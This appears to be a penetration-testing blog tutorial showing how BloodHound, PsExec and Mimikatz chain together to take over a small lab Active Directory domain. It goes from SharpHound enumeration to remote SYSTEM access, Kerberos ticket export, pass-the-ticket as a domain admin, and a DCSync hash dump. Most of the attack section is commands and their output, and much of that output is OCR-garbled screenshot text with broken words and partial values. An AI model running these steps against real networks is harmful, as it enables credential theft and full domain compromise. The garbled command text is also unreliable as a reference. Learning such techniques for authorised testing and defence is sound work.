BloodHound by Example

Bloodhound (https://github.com/BloodHoundAD/BloodHound) provides an effective way to map Active Directory networks, and analyse the information for potential attack paths. In this scenario, we’re going to be looking at a practical example as to how the tool could be used to exploit trust relationships in a small domain environment.

To begin with we execute the BloodHound client, SharpHound on a system CLIENT1 under the ALICE user account. No special privileges are required to do this:

Administrator: 
: \ roo Ikit >SharpHound . exe<br />
Initializing BloodHound at 4:45 AM on 2/10/2019<br />
esolued Collection Methods to Group. LocalGroup. Session. reusts<br />
tart ing Enumeration For bgtest . local<br />
tatus: 48 objects enumerated (+48 48/s —<br />
Using 23 MB RAM )<br />
inished enumeration For bgtest . local in .7898232<br />
hosts Failed ping. hosts timedout.<br />
ompressing data to .<br />
ou can upload this File directly to the UI.<br />
inished compressing Files!<br />
: \ roolkit><br />
EllÄll•æ

SharpHound collects two key pieces of information; Active Directory accounts and their groups, and it determines which accounts are logged into systems.

The tool exports it output to a Zip file. This can then be imported into the BloodHound graphical interface:

ADMINIST 
OR 
ENTERPRISE 
INS@B 
BOB@BGTE 
DOMAIN A 
.LOCAL 
Me rnberOf 
GROUP POLICY CREATOR OWNERS@BGTEST.LOCAL 
ST. LOCAL 
ST. LO 
DOMAIN CO 
WIN-S16N6K2RCAE.BGTEST.LOCAL 
LERS@BGTEST.LOCAL 
Adm in TO 
ADMINISTRATORS@BGTEST.LOCAL 
SUPPORT@BGTEST.LOCAL 
ITSUPPORT@BGTEST.LOCAL 
MemberOf 
CLIENT2.BGTEST.LOCAL 
ALICE@BGTEST.LOCAL

 

From this diagram, we can see a fairly clear attack path. ALICE is a member of the SUPPORT group, which in turn is a member of ITSUPPORT. This allows us access to the CLIENT2 system. User BOB is currently logged into this host, who is a member of the DOMAIN ADMINS group.

To exploit this attack path, from the CLIENT1 system where we ran BloodHound, we can use PSExec to connect to the CLIENT2 system as the SYSTEM account. This works since ALICE is a member of the local administrators on CLIENT2:

 

: Ikit >PsExec . exe<br />
sExec u2.2 —<br />
Execute<br />
—s cmd.exe<br />
processes remotely<br />
opyright (C) 2001 —2016 Mark Russ inouich<br />
ys internals<br />
www . sys internals.com<br />
icrosoFt Windows [Uersion 6 ]<br />
opyright (c) 2009 Microsoft Corporation .<br />
: ystem32 >whoami<br />
t authority\system<br />
All rights<br />
reserved.

We can then run Mimikatz on the host to export the Kerberos ticket for the BOB account:

mimikatz sekurlsa: : tickets / export 
Authentication Id : 
ø ; 193480 cøøøøøøøø:øøø2F3c8) 
. Network From 
User Name 
. al ice 
: BGIEsr 
Logon Server 
: (null) 
Logon ime 
: 2/10/2019 
Username 
. al ice 
Domain 
: BGIEsr -LOCAL 
Password 
: (null) 
Group — 
Group I 
Group 2 
icket 
Client 
icket 
Granting Service 
Ticket ? 
Granting icket 
ø ; 176349 cøøøøøøøø:øøø2b0dd) 
Authentication Id : 
User Name 
Logon Server 
Logon ime 
Username 
Domain 
Password 
. Network From 
. al ice 
: BGIEsr 
: (null) 
: 2/10/2019 
. al ice 
: BGIEsr -LOCAL 
: (null) 
Group — 
Group I 
Group 2 
icket 
Client 
icket 
Granting Service 
Ticket ? 
Granting icket 
ø ; 81713 cøøøøøøøø:øøø13F31) 
Authentication Id : 
User Name 
Logon Server 
Logon ime 
Username 
Domain 
Password 
Interactive From I 
: bob 
: BGIEsr 
: WIN-S16N6K2RCRE 
: 2/10/2019 
: bob 
: BGIEsr -LOCAL 
: (null) 
Group — 
Ticket Granting Service 
[ øøøøøøøø]

With the ticket output to file, we can then import the ticket into the current session to assume the BOB accounts identity:

C : >mimikatz . exe<br />
. uuuuu .<br />
utt / utt<br />
'ttu u utt'<br />
' uuuutt'<br />
mimikatz<br />
Privilege<br />
mimikatz<br />
mimikatz 2.1 .1 (x86) "17763 Dec<br />
• 'R La Uie. R L' Amour"<br />
(oe.eo)<br />
/ m Benjamin DELPY 'gentilkiwi'<br />
9 2018<br />
Kitten Edition<br />
( benäamin@gentilkiwi.com )<br />
> http://blog.gentilkiwi.com/mimikatz<br />
Uincent LE roux<br />
( Vincent.letoux@gmail.com )<br />
> http://pingcastle.com / http://mysmartlogon.com<br />
privilege : :debug<br />
'20' OK<br />
kerberos .<br />
• :ptt [0;13F31<br />
File: ' [0;13F31 : O<br />
mimikatz exit<br />
Bye !<br />
C: >klist<br />
klist<br />
Current Logonld is Ø:Øx3e7<br />
Cached rickets: (I)<br />
Client: bob e BGIEsr -LOCAL<br />
Server: krbtgt/BGIESr -LOCAL e BGIEsr -LOCAL<br />
Kerbiicket Encryption Type: RSADSI RC4-HMRC(ND<br />
icket Flags Øx4ØeØØØØØ Forwardable renewable<br />
Start ime.<br />
• 2/10/2019 (local)<br />
End rime:<br />
2/10/2019 (local)<br />
Renew rime.<br />
• 2/17/2019 (local)<br />
Session Key Type: RSADSI RC4-HMRC(ND<br />
initial pre_authent

Since BOB is a member of the “DOMAIN ADMINISTRATORS” group and as such has “Replicate Directory Changes All” permission, we are then able to execute a DCSync to extract password hashes from the domain controller:

imikatz Isadump: :dcsync 'domain :bgtest . local 
[DC] ' bgtest. local' will be the domain 
[DC] 'WIN-S16N6K2RCRE.bgtest.10ca1' will be the 
[DC] ' bob' will be the user account 
'user: bob 
DC server 
bäect RDN 
sqm ACCOUNT 
AM Username 
ser Principal 
ccount ype 
Name 
ser Account Control 
ccount expiration 
assword last change 
bäect Security ID 
bäect Relative ID 
redentials : 
ntlm— 
upplemental 
. bob test 
: bob 
: bob@bgtest . local 
: 3øøøøøøø ( USER_OBJECT ) 
: øøøøø2øø ( NORMAL_RCCOUNT ) 
: 2/10/2019 
: 1105 
Hash NIL": 
Credentials : 
Primary : Kerberos —Newer—Keys 
Default Salt 
: BGIEsr .LOCRLbob 
Default Iterations 
Credentials 
aes256_hmac 
aes128_hmac 
des _c bc _md5 
rc4_p1ain 
: 4096 
(4096) 
(4096) 
(4096) 
(4096) 
: 3454Ø3Ø4Øc55cc4c?c6Fa6664ab5881b